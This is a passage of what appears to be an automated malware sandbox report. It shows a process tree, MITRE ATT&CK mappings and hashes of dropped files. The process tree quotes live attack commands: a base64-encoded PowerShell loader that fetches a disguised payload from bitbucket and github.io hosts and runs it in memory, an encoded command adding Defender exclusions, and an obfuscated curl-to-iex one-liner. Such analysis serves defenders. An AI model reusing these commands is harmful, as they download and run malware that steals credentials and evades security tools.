                                                              PID:10308
                                                            • C:\Windows\system32\find.exe
                                                              find "QEMU"
                                                              8⤵
                                                                PID:10328
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@a@Bh@GE@a@Bn@GQ@Yw@v@HM@ZQBn@GE@bQBp@C8@bgBp@C4@bwBj@C4@aQBh@GQ@bgB1@Hk@a@Br@Gk@b@Bh@HY@aQBo@HM@Lw@v@Do@cw@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBS@GU@ZwBB@HM@bQ@n@Cw@I@@n@D@@Jw@p@Ck@fQB9@@==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"
                                                                8⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                PID:10728
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.haahgdc/segami/ni.oc.iadnuyhkilavihs//:s', '0', 'StartupName', 'RegAsm', '0'))}}"
                                                                  9⤵
                                                                  • Blocklisted process makes network request
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:11452
                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                    10⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5160
                                                              • C:\Windows\System32\WScript.exe
                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.js"
                                                                8⤵
                                                                  PID:12360
                                                            • C:\Users\Admin\AppData\Local\Temp\10301370101\k3t05Da.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10301370101\k3t05Da.exe"
                                                              6⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Checks whether UAC is enabled
                                                              • System Location Discovery: System Language Discovery
                                                              PID:12048
                                                            • C:\Users\Admin\AppData\Local\Temp\10301380101\50KfF6O.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10301380101\50KfF6O.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              PID:12892
                                                              • C:\Windows\system32\attrib.exe
                                                                attrib +h +s C:\Users\Admin\AppData\Local\Temp\10301380101\50KfF6O.exe
                                                                7⤵
                                                                • Views/modifies file attributes
                                                                PID:5572
                                                            • C:\Users\Admin\AppData\Local\Temp\10301390101\zx4PJh6.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10301390101\zx4PJh6.exe"
                                                              6⤵
                                                                PID:12320
                                                                • C:\Windows\SysWOW64\CMD.exe
                                                                  "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
                                                                  7⤵
                                                                    PID:4984
                                                                • C:\Users\Admin\AppData\Local\Temp\10301400101\4wAPcC0.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10301400101\4wAPcC0.exe"
                                                                  6⤵
                                                                    PID:7924
                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                          1⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:3044
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4812 -ip 4812
                                                          1⤵
                                                            PID:4768
                                                          • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                            "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                            1⤵
                                                              PID:5436
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                              1⤵
                                                                PID:5616
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                1⤵
                                                                  PID:5696
                                                                • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                  1⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:60
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBEAGQALQBNAFAAcABSAEUARgBFAHIARQBOAEMAZQAgAC0ARQB4AEMATABVAHMAaQBvAE4AcABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVAB5AHAAZQBJAGQAXABBAHQAdAByAGkAYgB1AHQAZQBzAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXAAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAE8AcgBDAEUAOwAgAGEAZABEAC0ATQBwAHAAUgBFAEYARQByAGUAbgBDAGUAIAAtAGUAWABDAGwAdQBzAGkATwBOAHAAcgBvAEMARQBzAFMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABUAHkAcABlAEkAZABcAEEAdAB0AHIAaQBiAHUAdABlAHMALgBlAHgAZQAgAC0ARgBPAFIAQwBFAA==
                                                                  1⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:7056
                                                                • C:\Users\Admin\AppData\Roaming\TypeId\Attributes.exe
                                                                  C:\Users\Admin\AppData\Roaming\TypeId\Attributes.exe
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  PID:3376
                                                                • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                  1⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:6240
                                                                • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                  1⤵
                                                                    PID:8780
                                                                  • C:\Windows\system32\conhost.exe
                                                                    conhost --headless powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
                                                                    1⤵
                                                                    • Process spawned unexpected child process
                                                                    PID:7012
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
                                                                      2⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      PID:5932

                                                                  Network

                                                                  MITRE ATT&CK Enterprise v15

                                                                  Reconnaissance

                                                                  Resource Development

                                                                  Initial Access

                                                                  Execution

                                                                  Command and Scripting Interpreter

                                                                  2
                                                                  T1059

                                                                  JavaScript

                                                                  1
                                                                  T1059.007

                                                                  PowerShell

                                                                  1
                                                                  T1059.001

                                                                  Scheduled Task/Job

                                                                  1
                                                                  T1053

                                                                  Scheduled Task

                                                                  1
                                                                  T1053.005

                                                                  Persistence

                                                                  Boot or Logon Autostart Execution

                                                                  1
                                                                  T1547

                                                                  Registry Run Keys / Startup Folder

                                                                  1
                                                                  T1547.001

                                                                  Modify Authentication Process

                                                                  1
                                                                  T1556

                                                                  Scheduled Task/Job

                                                                  1
                                                                  T1053

                                                                  Scheduled Task

                                                                  1
                                                                  T1053.005

                                                                  Privilege Escalation

                                                                  Boot or Logon Autostart Execution

                                                                  1
                                                                  T1547

                                                                  Registry Run Keys / Startup Folder

                                                                  1
                                                                  T1547.001

                                                                  Scheduled Task/Job

                                                                  1
                                                                  T1053

                                                                  Scheduled Task

                                                                  1
                                                                  T1053.005

                                                                  Defense Evasion

                                                                  Hide Artifacts

                                                                  1
                                                                  T1564

                                                                  Hidden Files and Directories

                                                                  1
                                                                  T1564.001

                                                                  Modify Authentication Process

                                                                  1
                                                                  T1556

                                                                  Modify Registry

                                                                  1
                                                                  T1112

                                                                  Virtualization/Sandbox Evasion

                                                                  2
                                                                  T1497

                                                                  Credential Access

                                                                  Credentials from Password Stores

                                                                  1
                                                                  T1555

                                                                  Credentials from Web Browsers

                                                                  1
                                                                  T1555.003

                                                                  Modify Authentication Process

                                                                  1
                                                                  T1556

                                                                  Steal Web Session Cookie

                                                                  1
                                                                  T1539

                                                                  Unsecured Credentials

                                                                  5
                                                                  T1552

                                                                  Credentials In Files

                                                                  5
                                                                  T1552.001

                                                                  Discovery

                                                                  Browser Information Discovery

                                                                  1
                                                                  T1217

                                                                  Process Discovery

                                                                  1
                                                                  T1057

                                                                  Query Registry

                                                                  8
                                                                  T1012

                                                                  System Information Discovery

                                                                  7
                                                                  T1082

                                                                  System Location Discovery

                                                                  1
                                                                  T1614

                                                                  System Language Discovery

                                                                  1
                                                                  T1614.001

                                                                  Virtualization/Sandbox Evasion

                                                                  2
                                                                  T1497

                                                                  Lateral Movement

                                                                  Collection

                                                                  Data from Local System

                                                                  4
                                                                  T1005

                                                                  Command and Control

                                                                  Web Service

                                                                  1
                                                                  T1102

                                                                  Exfiltration

                                                                  Impact

                                                                  Replay Monitor

                                                                  Loading Replay Monitor...

                                                                  Downloads

                                                                  • C:\ProgramData\ecbiw\t0hdje
                                                                    Filesize

                                                                    96KB

                                                                    MD5

                                                                    6066c07e98c96795ecd876aa92fe10f8

                                                                    SHA1

                                                                    f73cbd7b307c53aaae38677d6513b1baa729ac9f

                                                                    SHA256

                                                                    33a2357af8dc03cc22d2b7ce5c90abf25ac8b40223155a516f1a8df4acbf2a53

                                                                    SHA512

                                                                    7d76207c1c6334aa98f79c325118adf03a5ba36b1e2412803fd3e654a9d3630c775f32a98855c46342eba00d4a8496a3ded3686e74beaac9c216beee37aa5cb7

                                                                    Download Submit

                                                                  • C:\ProgramData\p8q9r\r9rq1n
                                                                    Filesize

                                                                    6KB

                                                                    MD5

                                                                    0802b2640deb9a70963be3c541e83140

                                                                    SHA1

                                                                    cbef85fcd8125e9153f56cabc1c7072d34bc1da9

                                                                    SHA256

                                                                    a83c8e9f720aa9613230d06535fe43193b984f148fda2ecc19f35f57c4d94838

                                                                    SHA512

                                                                    5d351378453a572807335a9227f53698fb4ea103efb812a635032ed24696adb189e3ade303a4e287e94b960fdd317530d252d05410da785b97e9820715aace9f

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                    Filesize

                                                                    40B

                                                                    MD5

                                                                    e583b3bcd0a283734268ceaab094ecf6

                                                                    SHA1

                                                                    31cd245bfde1e6f488730f052d6d37bbcfe470ea

                                                                    SHA256

                                                                    a143092cbf17b2e36e7b5e9ec5058a2154cca9ac0c2b5841855c07439ae6c509

                                                                    SHA512

                                                                    3168641a34bfeed7098fe87c75ab92337c94baf76d8725e295a411853381514748e71a0c4c527893a653e1a30d0cf1b540ede8ba480ca655af78cbec0b259e21

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
                                                                    Filesize

                                                                    649B

                                                                    MD5

                                                                    8564acd7d1b7ae0223e2cba18d60d81d

                                                                    SHA1

                                                                    309890175ee2389628fa096789d8ffdf10f388f5

                                                                    SHA256

                                                                    3266831a7c0d04e36f9371943343750d24ebcaa523830263677fe2fe90d74eca

                                                                    SHA512

                                                                    723ecc12d162b1572cd45c6432634a10c8030cc6af37f6ddbdfaa25415b6e5423b3585e0c55d4c6096f6b8ade7082a72dc18826a4946e6f8ce300342ea4e2bdb

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                                                    Filesize

                                                                    2B

                                                                    MD5

                                                                    d751713988987e9331980363e24189ce

                                                                    SHA1

                                                                    97d170e1550eee4afc0af065b78cda302a97674c

                                                                    SHA256

                                                                    4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                    SHA512

                                                                    b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\d93f1aa6-b92c-4667-a035-e34e38f70df8.tmp
                                                                    Filesize

                                                                    1B

                                                                    MD5

                                                                    5058f1af8388633f609cadb75a75dc9d

                                                                    SHA1

                                                                    3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                    SHA256

                                                                    cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                    SHA512

                                                                    0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                                                    Filesize

                                                                    80KB

                                                                    MD5

                                                                    ed954fd1fd6f8b17c6a770eedcd8d9d3

                                                                    SHA1

                                                                    98da73554162706e00e015de64125a7fd5a0a5d5

                                                                    SHA256

                                                                    9e205e46edff42a816e284c37f98f44f7f79949e15dd31754639e898cd507939

                                                                    SHA512

                                                                    ec65ffe319f78c724dae4ef735886733e32dcdce6c4f2a2696a17d71530771d58bc1dc6b9dcfcb1240ca27449f81c8a26e9a5309fdfb9b86fb70405e166d1fde

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\k3t05Da.exe.log
                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    400f1cc1a0a0ce1cdabda365ab3368ce

                                                                    SHA1

                                                                    1ecf683f14271d84f3b6063493dce00ff5f42075

                                                                    SHA256

